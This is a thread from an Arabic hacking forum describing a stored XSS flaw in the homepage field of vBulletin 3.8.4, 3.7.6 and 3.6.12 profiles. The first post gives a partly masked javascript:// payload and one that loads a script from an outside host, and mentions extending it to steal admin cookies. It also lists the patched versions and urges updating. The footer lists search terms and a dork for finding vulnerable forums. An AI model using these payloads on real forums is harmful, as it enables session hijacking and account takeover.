اشترك في قناتنا ليصلك جديدنا

اشترك في قناتنا على اليوتيوب ليصلك جديدنا

كذلك الاعجاب بصفحتنا على الفيسبوك

ثغرة XSS في منتديات vBulletin 3.8.4

ثغرة XSS في منتديات vBulletin 3.8.4


النتائج 1 إلى 6 من 6

الموضوع: ثغرة XSS في منتديات vBulletin 3.8.4

  1. #1
    هكر مبتديء Array
    تاريخ التسجيل
    Sep 2010
    المشاركات
    5

    افتراضي ثغرة XSS في منتديات vBulletin 3.8.4



    أطلقت شركة Jelsoft تحديثات لعدّة اصدارات من سكريبت المنتديات vBulletin وذلك لوجود ثغرة XSS اكتشفت مؤخّراً في صفحة الملف الشخصي وأصابت الاصدارات 3.8.4 , 3.7.6 و 3.6.12 حيث يستغل المهاجم خطأ في طريقة تحقق سكريبت vB من حقل "الصفحة الشخصية" بشكل صحيح مما يمكّنه من زرع كود Javascript مكان رابط الصفحة الشخصيّة.





    في الملف الشخصي يستطيع الأعضاء وضع رابط للصفحة الشخصيّة, يتأكد سكريبت vBulletin من وجود www في الرابط الذي وضعه المستخدم أو عن طريق Regex يتحقق من مدخلات المستخدم (الأحرف a-z , الأرقام 1-9 بالاضافة لوجود ://).

    بهذه الحالة يستطيع المهاجم وضع الكود التالي في حقل الصفحة الشخصية:

    javascript://%0a********.write('***************(0)</script>')
    مما يؤدي لظهور نافذة تحتوي على الرقم 0 وهذا يدل على تشغيل كود الجافاسكريبت أو يقوم المهاجم بوضع الكود التالي:

    javascript://%0a********.write('<script src=http://intern0t.net/.k></script>')
    لتحويل المستخدمين لموقع آخر بشكل تلقائي (من المحتمل تطوير الاستغلال السابق ليعمل على سرقة الكوكيز الخاصّة بالمستخدم أو مدير المنتدى وارسالها الى المهاجم وهذا يمكّنه من الدخول الى المنتدى باسم المستخدم أو مدير المنتدى دون الحاجة لمعرفة كلمة مرور).

    شركة جيل سوفت أطلقت الاصدارات التالية لاصلاح الثغرة السابقة:

    vBulletin 3.8.4 PL1
    vBulletin 3.7.6 PL1
    vBulletin 3.6.12 PL2


    نحن ننصح الجميع بالتحديث بأسرع وقت ممكن عن طريق تحميل الرقع الأمنية من صفحة المشتركين في موقع vBulletin مع ملاحظة أنك ستحتاج الى رخصة فعّالة لتتمكّن من دخول منطقة المشتركين وتحميل الرقع الأمنيّة السابقة.

    الجدير بالذكر أن استغلال هذه الثغرة انتشر بعد أن أطلقت شركة Jelsoft الاصدارات المحدثّة (مكتشف الاستغلال قارن الملفّات قبل وبعد التحديث ثم استنتج مكان وجود الثغرة).



  2. #2
    هكر مبتديء Array الصورة الرمزية هواوي
    تاريخ التسجيل
    Nov 2011
    المشاركات
    28

    افتراضي رد: ثغرة XSS في منتديات vBulletin 3.8.4

    مشكور حبيبي


  3. #3
    هكر مبتديء Array الصورة الرمزية هواوي
    تاريخ التسجيل
    Nov 2011
    المشاركات
    28

    افتراضي رد: ثغرة XSS في منتديات vBulletin 3.8.4

    بس اقدر استخدمها في اصدار

    Powered by vBulletin® Version 3.8.5



  4. #4
    هكر مبتديء Array
    تاريخ التسجيل
    Jun 2012
    المشاركات
    33

    افتراضي رد: ثغرة XSS في منتديات vBulletin 3.8.4

    مشكووووووووووووووور


  5. #5
    هكر مبتديء Array
    تاريخ التسجيل
    Dec 2009
    المشاركات
    36

    افتراضي رد: ثغرة XSS في منتديات vBulletin 3.8.4

    شكراااااااااااااااااااااا ااااااااااااا 11111111111111111111111


  6. #6
    هكر مبتديء Array
    تاريخ التسجيل
    Jun 2012
    الدولة
    فلسطين
    المشاركات
    33

    افتراضي رد: ثغرة XSS في منتديات vBulletin 3.8.4

    مشكووووووووووووووووووووور



المواضيع المتشابهه

  1. شرح استغلال ثغرة vBulletin 3.8.6
    بواسطة She!! Access في المنتدى قسم الثغرات
    مشاركات: 42
    آخر مشاركة: 04-09-2013, 04:50 PM
  2. كتاب إختراق منتديات vBulletin
    بواسطة ASDELY-ScOrPiOn في المنتدى منتدى إختراق المنتديات
    مشاركات: 103
    آخر مشاركة: 06-13-2012, 06:53 PM
  3. كيف أعرف ثغرة Powered by vBulletin
    بواسطة المومري في المنتدى قسم المشاكل والإستفسارات
    مشاركات: 2
    آخر مشاركة: 02-12-2012, 02:19 PM
  4. ثغرة xss في نسخة vBulletin 4.0.2
    بواسطة ASDELY-ScOrPiOn في المنتدى قسم الثغرات
    مشاركات: 14
    آخر مشاركة: 12-16-2011, 10:44 PM
  5. ثغرات خطيره في منتديات vbulletin 4.0.4
    بواسطة ASDELY-ScOrPiOn في المنتدى قسم الثغرات
    مشاركات: 8
    آخر مشاركة: 10-02-2010, 09:13 AM

وجد الزوار هذه الصفحة بالبحث عن:

powered by vbulletin 3.8.4

vBulletin® Version 3.8.4 ثغرة

ثغرة منتدى 3.8.4

Powered by vBulletin® Version 3.8.4

اختراق منتديات vbulletin® version 3.8.4

اختراق المنتديات vBulletin 3.8.4

Powered by vBulletin Version 3.8.4

powered by vbulletin® version 3.8.4 ثغرة

ثغرات Powered by vBulletin® Version 3.8.4

ثغرة vb 3.8.4

vbulletin® version 3.8.4 ثغرات

Powered by vBulletin® Version 3.8.4

استغلال ثغرة powered by vbulletin® version 3.8.4

شرح اختراق منتدى 3.8.5

ثغرة vBulletin 3.8.4

ثغرات 3.8.4

intext:Powered by vBulletin Version 3.8.4

powered by vbulletin® version 3.8.4 ثغرات

vB 3.8.4

طريثة هكر منتدى 3.8.4

Powered by vBulletin® Version 3.8.4 exploits

اختراق vbulletin 3.8.4

استغلال ثغرة vb 3.8.4

ثغره Powered by vBulletin 3.8.5

ثغرة في نسخة 3.8.4

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •